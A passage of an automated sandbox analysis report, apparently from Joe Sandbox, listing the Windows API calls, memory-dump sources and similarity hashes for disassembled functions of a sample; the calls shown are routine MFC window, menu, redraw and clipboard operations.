                                                                  • GetMenuItemID.USER32(?,?), ref: 001E4326
                                                                  • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 001E4398
                                                                  • GetMenuState.USER32(?,?,00000400), ref: 001E43F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
                                                                  • String ID:
                                                                  • API String ID: 999183886-0
                                                                  • Opcode ID: 37d9d9dce299b6691b468098cbcbb53950e0cb09117e6812aa9410acaa93f82c
                                                                  • Instruction ID: fe90e00cf929431e94bfc11048ac8b86923a737d59377b915dd324e451e6b7b7
                                                                  • Opcode Fuzzy Hash: 37d9d9dce299b6691b468098cbcbb53950e0cb09117e6812aa9410acaa93f82c
                                                                  • Instruction Fuzzy Hash: 247146719006AA9BCF35EF65CC84BEDB7B5AF05314F1542EAE929A7291CB305E81CF40
                                                                  APIs
                                                                    • Part of subcall function 00215F25: __EH_prolog3_GS.LIBCMT ref: 00215F2C
                                                                    • Part of subcall function 00215F25: GetDesktopWindow.USER32 ref: 00215F3A
                                                                    • Part of subcall function 00215F25: SetRectEmpty.USER32(?), ref: 00215F71
                                                                    • Part of subcall function 00215F25: SetRectEmpty.USER32(?), ref: 00215F83
                                                                    • Part of subcall function 00215F25: CopyRect.USER32(?,?), ref: 00215F8E
                                                                    • Part of subcall function 00215F25: CopyRect.USER32(?,?), ref: 00215FAA
                                                                  • SetRectEmpty.USER32(?), ref: 00218185
                                                                  • ClientToScreen.USER32(?,?), ref: 002181AD
                                                                  • IsRectEmpty.USER32(?), ref: 002181D6
                                                                  • GetParent.USER32(?), ref: 002181E3
                                                                  • GetCursorPos.USER32(?), ref: 00218208
                                                                  • IsRectEmpty.USER32(?), ref: 002182BE
                                                                  • EqualRect.USER32(?,?), ref: 002182D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$Copy$ClientCursorDesktopEqualH_prolog3_ParentScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1345960709-0
                                                                  • Opcode ID: ea17d111476a64089f4b9871d189b44515e4f78ab770647709e2edacd2aa650e
                                                                  • Instruction ID: 7831b055304564a120a5ba33bf489268ea98a0cf829157437a9b8805b9d3fc66
                                                                  • Opcode Fuzzy Hash: ea17d111476a64089f4b9871d189b44515e4f78ab770647709e2edacd2aa650e
                                                                  • Instruction Fuzzy Hash: 09515C71E10519AFCF05DFA4D8889EEBBBAEF58710F24416AF815FB240CB719D548BA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0021DA56
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0021DABF
                                                                  • SetClassLongW.USER32(?,000000F6,00000000), ref: 0021DACB
                                                                  • GetWindowRect.USER32(?,?), ref: 0021DAEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: BrushClassColorLongRectWindow_memset
                                                                  • String ID: LA/$2
                                                                  • API String ID: 2638262843-3378029897
                                                                  • Opcode ID: f15e996ddfbe5fa171c6c188f96ed7121e657660cf0076721b15201ba5e2e2cf
                                                                  • Instruction ID: d75ab95cda22e523186b3ee3329a80add36f7ee5098e4572c7f6e29fa78fc70e
                                                                  • Opcode Fuzzy Hash: f15e996ddfbe5fa171c6c188f96ed7121e657660cf0076721b15201ba5e2e2cf
                                                                  • Instruction Fuzzy Hash: 7A6116B1A14209DFCF10DFA9C885BEEBBF9BF58340F10442AE91AE7251DB749951CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CaptureCursorReleaseState
                                                                  • String ID: D2$2$2
                                                                  • API String ID: 3832350104-1793331178
                                                                  • Opcode ID: 329bb48711c7b049d8f1bc11b153539ed6e91b85fe67de7c8c1e7882c534779a
                                                                  • Instruction ID: a804c0f1aa3f08d2ae8568e03a420a8b3ce52f44be76f0b814ff4d35ef2c40df
                                                                  • Opcode Fuzzy Hash: 329bb48711c7b049d8f1bc11b153539ed6e91b85fe67de7c8c1e7882c534779a
                                                                  • Instruction Fuzzy Hash: 095191716002099FDB65AF68C889BBEB7E5BF58310F14446EE656872A2EF709C80CF51
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 002A2F85
                                                                    • Part of subcall function 002A2EF6: OleGetClipboard.OLE32(?), ref: 002A2F0E
                                                                  • ReleaseStgMedium.OLE32(?), ref: 002A2FFA
                                                                  • ReleaseStgMedium.OLE32(?), ref: 002A303F
                                                                  • CoTaskMemFree.OLE32(?), ref: 002A30E7
                                                                  • ReleaseStgMedium.OLE32(?), ref: 002A305F
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask_malloc
                                                                  • String ID: '
                                                                  • API String ID: 3930503942-1997036262
                                                                  • Opcode ID: 346bb77daaa3d5ab523e48c93a0c64646902edaf0894d865bcf3e2279a80c624
                                                                  • Instruction ID: bc94b14328946fab628dcb02b5da46a4aa9a1186813b58a80de58ba3b8c8791d
                                                                  • Opcode Fuzzy Hash: 346bb77daaa3d5ab523e48c93a0c64646902edaf0894d865bcf3e2279a80c624
                                                                  • Instruction Fuzzy Hash: C6517D71920209EFCF10DFA4C989AED7BB4AF19300F20842EF545EB281DF759B548B61
                                                                  APIs
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 002124F4
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 002124FB
                                                                  • CopyRect.USER32(?,?), ref: 0021250D
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0021251D
                                                                  • IntersectRect.USER32(?,?,?), ref: 00212550
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
                                                                  • String ID: (
                                                                  • API String ID: 2931574886-3887548279
                                                                  • Opcode ID: 14706fc015713232eca46ac5347b5e8a1ddd3fb8f797b0cb2657302f213c6459
                                                                  • Instruction ID: a39a4d903da9580451268a5e4f18cfccdfc03ad25ae5788f895eb3b5d822614d
                                                                  • Opcode Fuzzy Hash: 14706fc015713232eca46ac5347b5e8a1ddd3fb8f797b0cb2657302f213c6459
                                                                  • Instruction Fuzzy Hash: 8151D5B1D10209DFCB24CFA9D988AEEFBF9BF58300B50452AE515A7250DB70AA54CF60
                                                                  APIs
                                                                    • Part of subcall function 00239B37: __EH_prolog3_catch.LIBCMT ref: 00239B3E
                                                                  • UpdateWindow.USER32(?), ref: 001E8871
                                                                  • EqualRect.USER32(?,?), ref: 001E88A7
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 001E88BF
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 001E88CE
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 001E88E3
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 001E88F5
                                                                  • UpdateWindow.USER32(?), ref: 001E88FE
                                                                    • Part of subcall function 001E83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 001E8420
                                                                    • Part of subcall function 001E83AB: InflateRect.USER32(?,?,?), ref: 001E8466
                                                                    • Part of subcall function 001E83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 001E8479
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                                  • String ID:
                                                                  • API String ID: 1041772997-0
                                                                  • Opcode ID: 80c4f655925124e8b355263025401ef5606ce7f4844f4d8b3115cc56d2e5b7a7
                                                                  • Instruction ID: aae654bf5b8d4b8770df18cc982f292379e46d4c9bd23470da130a07f8aee76d
                                                                  • Opcode Fuzzy Hash: 80c4f655925124e8b355263025401ef5606ce7f4844f4d8b3115cc56d2e5b7a7
                                                                  • Instruction Fuzzy Hash: 20415871A006459FCB11DF69C8C8BAE77B9BB48314F140279ED4AEF192DB309945CB61
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 001D8A44
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001D8A68
                                                                  • UpdateWindow.USER32(?), ref: 001D8A83
                                                                  • SendMessageW.USER32(?,00000121,00000000,?), ref: 001D8AA4
                                                                  • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 001D8ABC
                                                                  • UpdateWindow.USER32(?), ref: 001D8AFF
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001D8B30
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                  • String ID:
                                                                  • API String ID: 2853195852-0
                                                                  • Opcode ID: 110060394703e8baf7f55c2e77a8d7f5ca2bb043b9d3282e881e7b15478d558c
                                                                  • Instruction ID: dd63ce1da991d582dbc876e3666d928e17cc2f60fe4ee652e6b9bed2d7420e79
                                                                  • Opcode Fuzzy Hash: 110060394703e8baf7f55c2e77a8d7f5ca2bb043b9d3282e881e7b15478d558c
                                                                  • Instruction Fuzzy Hash: AE419D70900645EBCF219FAACC89EAFBFB4FF91744F24452FE485A62A1DB718940DB50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 0023DB3D
                                                                    • Part of subcall function 001CDB6E: __EH_prolog3.LIBCMT ref: 001CDB75
                                                                    • Part of subcall function 001CDB6E: LoadCursorW.USER32(00000000,00007F00), ref: 001CDBA1
                                                                    • Part of subcall function 001CDB6E: GetClassInfoW.USER32(?,00000000,?), ref: 001CDBE5
                                                                  • CopyRect.USER32(?,?), ref: 0023DBF1
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A
                                                                  • IsRectEmpty.USER32(?), ref: 0023DC0A
                                                                  • IsRectEmpty.USER32(?), ref: 0023DC22
                                                                  • IsRectEmpty.USER32(?), ref: 0023DC37
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$ClientScreen$ClassCopyCursorH_prolog3H_prolog3_InfoLoad
                                                                  • String ID: Afx:ControlBar
                                                                  • API String ID: 2202805320-4244778371
                                                                  • Opcode ID: a31c4eaa1a0530bfc9e066351423a60d2adb09298810817192bb34f4f9113b51
                                                                  • Instruction ID: 20824843d2c4400e8655818f391cb9fe34c327f7addb74bda33673ffc5d98ae3
                                                                  • Opcode Fuzzy Hash: a31c4eaa1a0530bfc9e066351423a60d2adb09298810817192bb34f4f9113b51
                                                                  • Instruction Fuzzy Hash: 734139719102189BCF15EFA4D884EEEB7BABF19300F050169FD06BB251DB71E915CB60
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0028A64E
                                                                    • Part of subcall function 0024C236: __EH_prolog3.LIBCMT ref: 0024C23D
                                                                    • Part of subcall function 002A236A: SetRectEmpty.USER32(?), ref: 002A239A
                                                                  • SetRectEmpty.USER32(?), ref: 0028A796
                                                                  • SetRectEmpty.USER32(?), ref: 0028A7A5
                                                                  • SetRectEmpty.USER32(?), ref: 0028A7AE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect$H_prolog3
                                                                  • String ID: False$True
                                                                  • API String ID: 3752103406-1895882422
                                                                  • Opcode ID: 85cc892d4a15c10000f5eb0d073cc64c7265632ce25cfa93ff648ab3a024158d
                                                                  • Instruction ID: 0fdf8bc9d8257fac0a18c70861338758c6026c10d42e647b13f007c0bf2f5ca1
                                                                  • Opcode Fuzzy Hash: 85cc892d4a15c10000f5eb0d073cc64c7265632ce25cfa93ff648ab3a024158d
                                                                  • Instruction Fuzzy Hash: AD5190B0812B448FD366EF7AC5857DAFAE8BF64304F50495ED0AE962A1CBB02644CF15
                                                                  APIs
                                                                    • Part of subcall function 001E07A0: _malloc.LIBCMT ref: 001E07B3
                                                                  • _free.LIBCMT ref: 001E085C
                                                                  • _memset.LIBCMT ref: 001E0875
                                                                  • _memset.LIBCMT ref: 001E08AF
                                                                  • _memcpy_s.LIBCMT ref: 001E08C9
                                                                  • CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 001E08E2
                                                                  • _free.LIBCMT ref: 001E08F4
                                                                  • _free.LIBCMT ref: 001E0927
                                                                    • Part of subcall function 002BE216: HeapFree.KERNEL32(00000000,00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056), ref: 002BE22C
                                                                    • Part of subcall function 002BE216: GetLastError.KERNEL32(00000000,?,002C5DB2,00000000,?,002C4298,?,00000001,?,?,002C6FC6,00000018,00328280,0000000C,002C7056,?), ref: 002BE23E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2204576675-0
                                                                  • Opcode ID: 7da75320c47f427284e92ab887418c89e4f76136cdbf8d8d0d90938aae75e9ee
                                                                  • Instruction ID: 4c33e699e6ba7a830bf5fbb3976f3bff25a1f5d5a51b4581ab64aaf1c228137d
                                                                  • Opcode Fuzzy Hash: 7da75320c47f427284e92ab887418c89e4f76136cdbf8d8d0d90938aae75e9ee
                                                                  • Instruction Fuzzy Hash: 3331D472910A55ABEB25DF25CC01FAF73A8EF19364F114429E985A7242D7B0ED808BE0
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00213093
                                                                    • Part of subcall function 00220419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00220490
                                                                  • IsWindowVisible.USER32(?), ref: 002130BD
                                                                  • IsWindowVisible.USER32(?), ref: 00213101
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00213123
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 00213135
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00213157
                                                                  • RedrawWindow.USER32(?,?,00000000,00000541), ref: 00213188
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Redraw$Visible
                                                                  • String ID:
                                                                  • API String ID: 1637130220-0
                                                                  • Opcode ID: fd5c62b425bb66655fd6afa5f83abec84328804297848f2cbf326fcc6e6f22e8
                                                                  • Instruction ID: c72321f99222b424dbdbfac2e589e47746fcd2859952282fcd6a59e629d91d52
                                                                  • Opcode Fuzzy Hash: fd5c62b425bb66655fd6afa5f83abec84328804297848f2cbf326fcc6e6f22e8
                                                                  • Instruction Fuzzy Hash: E9416A7161024AEFDB20DF65CDC0AAABBFABF14345F10447DE14A96261D7309E90CF61
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001D913A
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 001D9163
                                                                  • GetWindowLongW.USER32(?,000000FC), ref: 001D9175
                                                                  • GetWindowLongW.USER32(?,000000FC), ref: 001D9186
                                                                  • SetWindowLongW.USER32(?,000000FC,?), ref: 001D91A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend_memset
                                                                  • String ID: ,
                                                                  • API String ID: 2997958587-3772416878
                                                                  • Opcode ID: ecc11d224d36ac5310b73809c07063d1d1dbacd3d70ef78078364d92acd4be51
                                                                  • Instruction ID: 1a142a0c2a8ade2d72706fb1a2222d2dd8ada5294a6efeb81929de12848aba3d
                                                                  • Opcode Fuzzy Hash: ecc11d224d36ac5310b73809c07063d1d1dbacd3d70ef78078364d92acd4be51
                                                                  • Instruction Fuzzy Hash: 38417E75600305AFDB20EF78D889A6EB7E9BF58320F14066EF58697791DB30E900CB90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0023DF15
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 0023DFA9
                                                                  • SendMessageW.USER32(?,00000421,00000001,?), ref: 0023DFC1
                                                                  • _calloc.LIBCMT ref: 0023DFDD
